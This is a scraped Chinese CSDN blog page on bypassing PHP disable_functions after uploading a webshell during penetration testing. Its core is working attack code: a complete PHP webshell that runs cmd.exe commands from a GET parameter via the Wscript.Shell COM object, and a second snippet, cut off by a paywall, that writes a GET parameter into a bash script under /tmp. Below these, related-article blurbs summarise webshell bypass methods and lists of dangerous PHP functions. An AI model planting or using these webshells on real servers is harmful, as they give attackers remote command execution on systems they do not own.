pcntl php windows_姿势分享——PHP函数禁用绕过浅谈

最新推荐文章于 2022-10-31 20:03:00 发布
最新推荐文章于 2022-10-31 20:03:00 发布
阅读量214 收藏
点赞数
文章标签: pcntl php windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39550172/article/details/112404774
版权
本文探讨了在渗透测试中遇到PHP函数如exec()被禁用的情况,分享如何在Windows环境下利用pcntl扩展来实现系统命令执行的绕过技巧。提供了一段相关代码,并鼓励读者关注以获取更多渗透测试知识。
摘要由CSDN通过智能技术生成

95e2db094d03015307029885b784a35d.gif

在渗透测试过程中可能经常会遇到上传webshell后,由于php.ini配置禁用了一些如exec(),shell_exec(),system()等执行系统命令的函数,导致无法执行系统命令,就此问题给出几种绕过方法。

话不多说,直接贴代码:

<?php $phpwsh=new COM("Wscript.Shell") or die("Create Wscript.Shell Failed!");  $exec=$phpwsh->exec("cmd.exe /c ".$_GET['c']."");  $stdout = $exec->StdOut();  $stroutput = $stdout->ReadAll();  echo $stroutput;  ?>
<?php header("Content-Type: text/plain");$cmd="/tmp/exec";@unlink($cmd);$c = "#!/usr/bin/env bash\n".$_GET[x]."> /tmp/output.txt\n";file_put_contents($cmd, $c);chmo
最低0.47元/天 解锁文章
weixin_39550172
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php禁止所有webshell的函数,Webshell下命令执行限制及绕过方法
weixin_34996026的博客
03-18 1322
0×00前言上传webshell后,执行命令时或许没法执行了,这时我们该分析下原理并想出绕过方式,防守方也必须根据绕过方式想想更强的防御.0×01 php webshell执行命令原理php webshell(以下简称webshell)下是怎么执行系统命令的?我们找一个webshell分析下搜索关键字定位到以下代码function execute($cfe) {$res = '';if ($cfe...
php war,PHP提示Warning:phpinfo() has been disabled函数禁用的解决方法
weixin_29730445的博客
03-09 197
本文实例讲述了PHP提示Warning:phpinfo() has been disabled函数禁用的解决方法。分享给大家供大家参考。具体分析如下:今天在一朋友服务器测试一个网站时发现我在测试phpinfo时碰到PHP Warning:phpinfo() has been disabled for security reasons 提示了,按话的意思我总结了解决办法,下面我们一起来看看吧.在运行...
学习笔记-绕过php禁用函数
人饭子的博客
10-31 653
bypass_disable_function 相关文章 & Source & Reference CTF的命令执行绕过 无需sendmail:巧用LD_PRELOAD突破disable_functions php函数禁用绕过的原理与利用 相关工具 Medicean/as_bypass_php_disable_functions yangyangwithgnu/byp...
php5.6安装pcntl报错,thinkphp 5.0报错pcntl_signal() has been disabled for security reasons问题解决...
weixin_28938385的博客
03-25 1731
搜索热词环境centos7thinkPHP 5.0think-worker 1.0.1Workerman version:3.5.30PHP version:5.6.9thinkPHP 5.0使用workerman,启动workerman服务端报错pcntl_signal()hasbeendisabledforsecurityreasonsinfile/www/wwwroot/s...
实战绕过宝塔PHP disable_function 限制getshell
zhangge3663的博客
03-09 3706
一、这次做的目标站点是一个某XX站点,通过前期的信息收集,可以发现该站点是由宝塔(一般根服务器开放端口888、8888和报错界面判定)+ShuipfCMS框架搭建的 端口信息 后台 二、默认的ShuipfCMS系统后台访问http://www.xxx.com/admin/会自动跳转到后台,但是这个站点感觉是被二次开发过的,站点后台和前端页面不在同一个子域名下,该后台还是通过收集子域名得到的,访问某xxx.xxx.com会自动跳转到后台登录页面。 三、这里想着尝试绕过验证码来对后台用户名密码进
禁止不安全的php函数(php.ini)
huike008的博客
12-29 713
为了使php程序更安全,很多站长都选择了禁用一些比较敏感的函数,那影响php安全的函数到底有哪些呢,下面我们列出了一些:1、phpinfo() 功能描述:输出 PHP 环境信息以及相关的模块、WEB 环境等信息。 危险等级:2、passthru() 功能描述:允许执行一个外部程序并回显输出,类似于 exec()。 危险等级:高3、exec() 功能描述:允许执行一个外部程序(如 UNI...
php pcntl_fork和pcntl_fork 的用法
10-30
`php pcntl_fork` 和 `pcntl_fork` 是 PHP 用于实现多进程编程的两个关键函数。它们属于 PHP 的 Process Control (PCNTL) 扩展,主要用于 Linux 系统,因为 Windows 平台不支持这些功能。在使用这两个函数之前,你...
PHP使用pcntl_fork实现多进程下载图片的方法
10-25
主要介绍了PHP使用pcntl_fork实现多进程下载图片的方法,较为详细的分析了pcntl_fork的原理与用法,以及使用pcntl_fork实现多进程下载图片的方法,非常具有实用价值,需要的朋友可以参考下
PHP多进程之pcntl_fork的实例详解
10-19
主要介绍了PHP多进程编之pcntl_fork的实例详解的相关资料,希望通过本文能帮助到大家,让大家理解掌握这部分内容,需要的朋友可以参考下
phppcntl_fork创建子进程的方法实例
10-17
主要介绍了phppcntl_fork创建子进程的方法实例,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
php禁用了所有命令执行的函数 怎么搞,PHP通过bypass disable functions执行系统命令的方法汇总...
weixin_39986973的博客
03-11 766
一、为什么要bypass disable functions为了安全起见,很多运维人员会禁用PHP的一些“危险”函数,例如eval、exec、system等,将其写在php.ini配置文件,就是我们所说的disable functions了,特别是虚拟主机运营商,为了彻底隔离同服务器的客户,以及避免出现大面积的安全问题,在disable functions的设置也通常较为严格。攻与防是对立的,...
php没开启cuel_php禁用函数设置及查看方法详解
weixin_39890543的博客
12-22 151
本文实例讲述了php禁用函数设置及查看方法。分享给大家供大家参考,具体如下:打开PHP.INI,找到这行:disable_functions =在后面那里加上要禁用函数,如禁用多个函数,要用半角逗号 , 分开给个例子:disable_functions = passthru,exec,system,popen,chroot,scandir,chgrp,chown,escapeshellcmd,e...
PHP的危险函数全解析
★昔梦无痕★
08-12 1328
在编译 PHP 时,如无特殊需要,一定禁止编译生成 CLI 命令行模式的 PHP 解析支持。可在编译时使用 –disable-CLI。一旦编译生成 CLI 模式的PHP,则可能会被入侵者利用该程序建立一个WEB Shell 后门进程或通过PHP 执行任意代码。phpinfo()功能描述:输出 PHP 环境信息以及相关的模块、WEB 环境等信息。危险等级:passthru()功
php system函数攻击,禁用php的system函数以获取shell访问
weixin_42180863的博客
04-09 672
禁用php的system函数以获取shell访问2016-05-03 21:23:03 来源:360安全播报 阅读:2128次分享到:您可以禁用PHP函数如果你拥有一个运行着PHP的Web服务器,禁用一些PHP的危险功能可能是一个好主意,其有些功能也许是你的网站所不需要的 。如果攻击者设法在你的服务器上运...
php一句话木马调用cmd命令,一句话木马(webshell)是如何执行命令的
weixin_39617669的博客
03-09 2159
在很多的渗透过程,渗透人员会上传一句话木马(简称webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是如何执行的呢,下面我们就对webshell进行一个简单的分析。首先我们先看一个原始而又简单的php一句话木马。看到这里不得不赞美前辈的智慧。对于一个稍微懂一些php的人而言,或者初级的安全爱好者,或者脚本小子而言,看到的第一...
命令执行绕过姿势
qq_45888826的博客
10-04 645
命令执行绕过姿势
pcntl php windows_使用php安装pcntl模块
weixin_34553415的博客
12-31 1573
想添加个php多进程任务,突然发现服务器上php不支持pcntl扩展,再看了下也没有phpize这个模块首先看下当前php版本[root@htest ~]# php -vPHP 5.3.3 (cli) (built: Mar 22 2017 12:27:09)Copyright (c) 1997-2010 The PHP GroupZend Engine v2.3.0, Copyright (c)...
利用pcntl_exec突破disable_functions
收集盒 Book box
04-20 2589
1、说明     pcntl是linux下的一个扩展,可以支持php的多线程操作。     pcntl_exec函数的作用是在当前进程空间执行指定程序,版本要求:PHP 4 >= 4.2.0, PHP 5 2、利用     在做渗透的时候被disable_functions卡住不能执行命令是家常便饭,今天在一国外虚拟主机上又被卡了,但我在执行phpinfo();的时候眼前闪过–enable
php pcntl 进程池_PHPpcntl多进程用法实例
weixin_34803738的博客
03-09 148
本文实例讲述了PHPpcntl多进程用法。分享给大家供大家参考。具体分析如下:PHP使用PCNTL系列的函数也能做到多进程处理一个事务。比如我需要从数据库获取80w条的数据,再做一系列后续的处理,这个时候,用单进程?你可以等到明年今天了。所以应该使用pcntl函数了。假设我想要启动20个进程,将1-80w的数据分成20份来做,主进程等待所有子进程都结束了才退出:$max = 800000;$w...
php 父进程id,PHP pcntl_fork创建进程,复制父进程内存空间上下文
最新发布
05-26
当使用 `pcntl_fork()` 函数创建子进程时,子进程会复制父进程的内存空间上下文,并且在执行 `pcntl_fork()` 函数后,父进程和子进程会分别获得不同的进程 ID。在父进程,`pcntl_fork()` 函数返回子进程的进程 ID...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值